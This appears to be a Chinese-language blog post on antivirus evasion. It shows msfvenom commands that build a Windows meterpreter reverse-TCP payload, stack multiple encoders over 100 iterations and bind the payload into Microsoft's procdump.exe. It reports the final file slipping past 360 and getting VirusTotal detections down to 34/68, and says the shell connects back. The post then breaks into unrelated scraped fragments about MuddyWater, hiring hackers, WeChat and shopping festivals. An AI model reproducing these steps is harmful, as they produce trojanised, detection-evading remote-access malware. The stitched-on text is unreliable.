测试系统:windows10 (1909)
杀毒软件:360安全卫士
在线杀毒:VT
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe
原始生成后,完全被查杀
VT查杀55/69
这里使用msf自带的编码器进行测试
msfvenom --list encoders 查看当前所有编码器
这里根据级别(Rank)选择更好的(excellent)进行尝试:x86/shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129?LPORT=7777?-e x86/shikata_ga_nai -b "\x00" -i 20-f exe -o t2.exe
其中-b 特征码绕过 -i 编码次数
依旧被查杀
测试编码并绑定微软官方工具,这里使用官方procdump做实验
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129?LPORT=7777?-e x86/shikata_ga_nai -x?procdump.exe ?-i?20?-f exe -o t3.exe
360并未报毒,vt查杀率36/68
通过资料了解,msfvenom某一种编码器可以做到一定程度的免杀,这是可以多重编码增大免杀率,同时x86/shikata_ga_nai为多态编码,可以尝试增大编码次数达到免杀效果
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 100?LHOST=192.168.56.129?LPORT=7777?-f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 100?-f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 100?-f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 100?-x procdump.exe -k -f exe >t4.exe
这里测试编码次数100,同样绑定官方工具,360查杀并未报毒
VT在线查杀率34/68
测试可正常上线
MuddyWater还运用“PS2EXE”将PowerShell脚本转换为可履行文件,并将原始PowerShell代码作为一个Base64编码的字符串嵌入其间。 咱们注意到,MuddyWater习气运...
一、如何寻找电脑黑客高手(找电脑高手帮忙!需要报酬都可以!)方法总结 1、我想找一名电脑高手(黑客也可以)、应该在那找?hack论坛,不过后果自己负责去,都是收费服务的我要找电脑高手。黑客高手请问,...
给你好多个微信呢?小帮有两个微信。坚信大部分的工薪族都是会有两到三个手机微信,工作中与生活互相影响,有着好几个手机微信我觉得它是非常简单的了,终究发个朋友圈调侃一下老总還是很一切正常的~...
2000有系统日志安全日志和应用程序日志等三个日志,而与安全相关的数据包含在安全 黑客们在Internet上往往有他们自己的虚拟社区,他们在那儿讨论网络攻击技术方法,同。 找到攻击源的真正IP地址...
双十一活动什么时候开始(今年淘宝天猫双11规则介绍) 淘宝天猫2020双十一活动将会在10月底正式展开,用户们能够在其中购买到自己的需要的商品。那么大家知道2020淘宝天猫双十一的活动规则有哪些吗?...
如何删除WinXP系统IE的网站链接?WinXP系统用户经常在上网浏览某个网站的时候,发现浏览器窗口的“工具”菜单中加入了指向该网站的链接,还出现了该网站名字的按钮,这该如何删除呢?不少电脑公司...